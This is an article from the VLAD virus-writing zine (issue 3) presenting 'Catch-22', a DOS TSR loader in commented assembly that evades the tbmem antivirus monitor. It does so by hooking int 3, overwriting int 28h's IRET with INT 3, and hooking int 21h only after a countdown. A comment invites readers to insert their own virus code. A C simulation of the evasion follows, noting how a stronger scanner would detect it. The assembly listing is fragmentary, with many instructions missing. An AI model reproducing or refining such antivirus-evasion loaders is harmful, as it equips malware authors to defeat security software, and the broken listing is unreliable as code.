; Catch-22, a TSR loader by Rhincewind [Vlad]
;
; This is probably the most experimental thing I've done so far. In this
; loader I've combined a few things I learned about tbmem into a pretty
; neat loader that the current version of tbmem will not detect.
;
; The highloader is pretty straightforward, although it does use one
; trick I found. It traces the PSP chain all the way back to the command
; interpreter (following the parent-PSP word at offset 16h until it finds
; the PSP that is its own parent), then makes that PSP the active one
; (DOS function 50h) before a block is allocated for the loader. This
; so-called 'context switching' makes the newly allocated block the
; property of your command interpreter, so DOS leaves it alone when the
; loader's own PSP terminates, ensuring its lasting residency. Down with
; direct MCB twiddling!
;
; Now tbmem comes into play. First, two facts:
; Fact 1 - tbmem detects residency on vector changes only. It can't be
;          bothered to look at the memory itself.
; Fact 2 - tbmem does not flag the Intel-reserved interrupt vectors (int 0
;          to 1Fh, int 3 among them) being hooked.
;
; For starters the loader hooks int 3, which by Fact 2 does not alert
; tbmem. The first byte of the int 28h handler, which is an IRET (0CFh) in
; the original handler, is overwritten with an INT 3 (0CCh); by Fact 1
; tbmem never notices that byte. Now, as you probably know, only the
; command interpreter calls int 28h (okay, so do Terminate and a handful
; of other programs, watch out for those), and every int 28h call is now
; redirected to our routine. We managed to get a routine active around
; tbmem! Hurray! The int 3 handler then counts down on each int 28h call
; (the counter starts at 75h; 13 is the minimum, btw) to make sure that
; we're back in command mode, that is, out of the DOS deallocation
; routines, before we hook int 21h, which again eludes tbmem. Both int 28h
; and int 3 are restored and we're done with our loader.
parasize equ (endloader-start)            ; size of the resident part of the loader

; Installation check: int 21h with AX='TB' comes back with AX='AV' once
; our int 21h handler (below) is resident.
mov ax, 'TB'
cmp ax, 'AV'

; Shrink our own memory block (DOS function 4Ah, BX = new size in paragraphs).
mov ah, 4ah
sub bx, parasize+2

; Trace the PSP chain. The parent PSP's segment sits at offset 16h of each PSP;
; the command interpreter is its own parent, so stop when the two are equal.
cmp bx, word ptr ds:[si+16h]
mov bx, word ptr ds:[si+16h]              ; not there yet: step up to the parent

; 'Context switch': make the command interpreter the active PSP (function 50h,
; BX = PSP segment), allocate the resident block (function 48h, BX = paragraphs)
; so that it is owned by that PSP, then make our own PSP active again.
mov ah, 50h
mov ah, 48h
mov ah, 50h

; Copy the loader from CS:100h into the new block.
mov si, 100h
mov cx, endloader-start

; Hook int 3 (vector at 0000:000Ch) to point at install_21 in the new block (ES).
; SI has been moved past the vector while its old value was saved in
; intoffset/intseg, so [si-4]/[si-2] are the vector's offset and segment.
mov si, 3*4
mov word ptr [si-4],offset install_21-100h
mov word ptr [si-2],es

; Same for int 28h (vector at 0000:00A0h), saved in int2offset/int2seg, and
; initialise the countdown.
mov si, 28h*4
mov word ptr es:[di],75h                  ; ES:DI -> counter in the new block

; Overwrite the first byte of the original int 28h handler (the IRET, 0CFh)
; with INT 3 (0CCh); xchg leaves the original byte in AL, to be kept in orgbyte.
lds bx, dword ptr ds:[si-4]
mov al, 0cch
xchg byte ptr ds:[bx],al

; install_21: the int 3 handler, entered on every int 28h call through the
; patched IRET. Count down until the counter hits zero, then undo the patch,
; restore int 3 and finally hook int 21h.
;Restore all registers here, including DS&ES
dec word ptr cs:counter-100h
les di, dword ptr cs:int2offset-100h      ; ES:DI -> original int 28h handler
mov al, byte ptr cs:orgbyte-100h          ; put its first byte (the IRET) back
les di, dword ptr cs:intoffset-100h       ; ES:DI = saved int 3 vector
mov word ptr ds:[0ch],di                  ; restore int 3 (DS = 0)
mov word ptr ds:[0eh],es
; Hook int 21h (vector at 0000:0084h); the old vector ends up in
; intoffset/intseg, which the handler below chains to.
mov ax,offset int21-100h
xchg ax, word ptr ds:[84h]
xchg ax, word ptr ds:[86h]

; int21: our int 21h handler. Answer the installation check with AX='AV';
; everything else is passed on to the original handler.
;Replace the handler below with your k-rad virus code.
mov ax, 'AV'
jmp dword ptr cs:intoffset-100h

intoffset dw ?                            ; saved int 3 vector, later the saved int 21h vector
intseg dw ?
int2offset dw ?                           ; saved int 28h vector
int2seg dw ?
counter dw ?                              ; int 28h calls to wait for before hooking int 21h
orgbyte db ?                              ; original first byte of the int 28h handler
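The sequence described in the header and in the listing above, as an added example that is not part of the original loader: a C model of the install steps on a constructed real-mode address space. It walks a fake PSP chain to the command interpreter, allocates with that PSP active so the block survives the loader's own termination, hooks int 3, drops INT 3 (0CCh) over the IRET of a fake int 28h handler, counts int 28h calls down and only then hooks int 21h. A tbmem-like monitor, assumed from the two facts (it compares vectors before and after the program exits and ignores 00h-1Fh), sees nothing at exit, while a loader that hooks int 21h straight away is flagged. The segments (0100h, 1000h, 2000h, 9000h), the handler offsets INSTALL_21_OFF/INT21_OFF and the block-ownership rule are constructed for the model and are not from the page.

```c
/* Model of the Catch-22 install sequence on a constructed real-mode address space. Added example,
 * not the loader's own code; the segments, handler offsets and the monitor are assumptions. */
#include <stdint.h>
#include <string.h>

static uint8_t mem[0x100000];                       /* 1 MB address space, IVT at 0000:0000 */
static uint32_t lin(uint16_t seg, uint16_t off) { return ((uint32_t)seg << 4) + off; }
static uint16_t rd16(uint16_t seg, uint16_t off) { uint32_t a = lin(seg, off); return (uint16_t)(mem[a] | (mem[a + 1] << 8)); }
static void wr16(uint16_t seg, uint16_t off, uint16_t v) { uint32_t a = lin(seg, off); mem[a] = (uint8_t)v; mem[a + 1] = (uint8_t)(v >> 8); }
/* Vector n is the far pointer at 0000:n*4, offset word first, segment word second. */
static uint16_t vec_off(uint8_t n) { return rd16(0, (uint16_t)(n * 4)); }
static uint16_t vec_seg(uint8_t n) { return rd16(0, (uint16_t)(n * 4 + 2)); }
static void set_vec(uint8_t n, uint16_t seg, uint16_t off) { wr16(0, (uint16_t)(n * 4), off); wr16(0, (uint16_t)(n * 4 + 2), seg); }

/* tbmem-like monitor, assumed from the two 'facts': snapshot the IVT before a program runs and,
 * once it has exited, count the vectors that changed, ignoring the Intel-reserved range 00h-1Fh. */
static uint8_t ivt_before[256 * 4];
static void monitor_arm(void) { memcpy(ivt_before, mem, sizeof ivt_before); }
static int monitor_flagged(void) {
    int flagged = 0;
    for (int n = 0x20; n < 256; n++) flagged += memcmp(ivt_before + n * 4, mem + n * 4, 4) != 0;
    return flagged;
}

/* The DOS rule the context switch relies on: a block belongs to the PSP that is active when it is
 * allocated (int 21h/48h), and DOS releases a PSP's blocks when that PSP terminates. */
#define MAX_BLOCKS 8
static uint16_t block_owner[MAX_BLOCKS], active_psp;
static int block_live[MAX_BLOCKS];
static int alloc_block(void) {
    for (int i = 0; i < MAX_BLOCKS; i++)
        if (!block_live[i]) { block_live[i] = 1; block_owner[i] = active_psp; return i; }
    return -1;
}
static void terminate_psp(uint16_t psp) {
    for (int i = 0; i < MAX_BLOCKS; i++) if (block_owner[i] == psp) block_live[i] = 0;
}
/* PSP chain trace: follow the parent-PSP word at offset 16h until a PSP is its own parent
 * (the command interpreter); the hop limit guards against a corrupted chain. */
static uint16_t root_psp(uint16_t psp) {
    uint16_t parent; int hops = 0;
    while ((parent = rd16(psp, 0x16)) != psp && parent != 0 && hops++ < 64) psp = parent;
    return psp;
}

#define INSTALL_21_OFF 0x0040                       /* assumed offsets of install_21 and int21 in the block */
#define INT21_OFF      0x0080
struct loader {
    uint16_t seg, counter;                          /* block the body was copied to; int 28h countdown */
    uint16_t int3_seg, int3_off, int28_seg, int28_off;   /* saved vectors: intseg/intoffset, int2seg/int2offset */
    uint16_t int21_seg, int21_off;                  /* original int 21h vector, target of the chain jump */
    uint8_t orgbyte;                                /* first byte of the int 28h handler, 0CFh = IRET */
    int int21_hooked, block;
};
/* Install time: context switch + allocate, hook int 3, put an INT 3 (0CCh) over int 28h's IRET. */
static void loader_install(struct loader *l, uint16_t own_psp, uint16_t seg, uint16_t count) {
    active_psp = root_psp(own_psp);                 /* int 21h/50h: the command interpreter becomes the active PSP */
    l->block = alloc_block();                       /* int 21h/48h: the new block is therefore owned by it */
    active_psp = own_psp;                           /* int 21h/50h: switch back */
    l->seg = seg; l->counter = count; l->int21_hooked = 0;
    l->int3_seg = vec_seg(3); l->int3_off = vec_off(3);
    set_vec(3, seg, INSTALL_21_OFF);
    l->int28_seg = vec_seg(0x28); l->int28_off = vec_off(0x28);
    l->orgbyte = mem[lin(l->int28_seg, l->int28_off)];
    mem[lin(l->int28_seg, l->int28_off)] = 0xCC;    /* xchg al,[bx] with AL = 0CCh */
}
/* Every int 28h call now executes that INT 3 and lands in install_21: count down and, at zero,
 * restore the int 28h byte and the int 3 vector, then hook int 21h. */
static void loader_on_int28(struct loader *l) {
    if (l->int21_hooked || --l->counter != 0) return;
    mem[lin(l->int28_seg, l->int28_off)] = l->orgbyte;
    set_vec(3, l->int3_seg, l->int3_off);
    l->int21_seg = vec_seg(0x21); l->int21_off = vec_off(0x21);
    set_vec(0x21, l->seg, INT21_OFF);
    l->int21_hooked = 1;
}
/* Constructed environment: 'DOS' at segment 0100h owns int 21h/28h/3, COMMAND.COM's PSP is 1000h
 * (its own parent) and the loader runs from PSP 2000h, a child of 1000h. */
static void setup(void) {
    memset(mem, 0, sizeof mem); memset(block_live, 0, sizeof block_live);
    set_vec(0x21, 0x0100, 0x0010); set_vec(0x28, 0x0100, 0x0020); set_vec(3, 0x0100, 0x0030);
    mem[lin(0x0100, 0x0020)] = 0xCF;                /* the int 28h handler is a bare IRET */
    wr16(0x1000, 0x16, 0x1000); wr16(0x2000, 0x16, 0x1000);
}
/* Scenario record: monitor hits at loader exit, block survival, int 28h calls until the int 21h hook, final state. */
struct result { int flagged_at_exit, block_alive, int28_calls, int21_hooked, int3_restored, int21_is_loader; uint8_t int28_byte; };
static struct result run_scenario(uint16_t count) {
    struct result r; struct loader l;
    setup(); monitor_arm();
    loader_install(&l, 0x2000, 0x9000, count);
    terminate_psp(0x2000);                          /* loader exits; only the reserved int 3 vector has changed */
    r.flagged_at_exit = monitor_flagged(); r.block_alive = block_live[l.block];
    for (r.int28_calls = 0; !l.int21_hooked && r.int28_calls < 1000; r.int28_calls++) loader_on_int28(&l);
    r.int21_hooked = l.int21_hooked; r.int28_byte = mem[lin(l.int28_seg, l.int28_off)];
    r.int3_restored = vec_seg(3) == 0x0100 && vec_off(3) == 0x0030;
    r.int21_is_loader = vec_seg(0x21) == 0x9000 && vec_off(0x21) == INT21_OFF;
    return r;
}
/* For contrast: a loader that hooks int 21h straight away is caught the moment it exits. */
static int naive_loader_flagged(void) { setup(); monitor_arm(); set_vec(0x21, 0x9000, INT21_OFF); return monitor_flagged(); }
```

The results are returned in a struct rather than printed so they can be checked: run_scenario(0x75) reports no flagged vectors at exit, a surviving block, 117 (75h) int 28h calls before int 21h is hooked, and the IRET and the int 3 vector back in place afterwards, whereas naive_loader_flagged() reports one flagged vector. The monitor is deliberately the simplest reading of the two facts; a scanner that also hashed the first bytes of the int 28h handler, or diffed the reserved vectors, would catch this loader at install time.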
- VLAD #3 INDEX -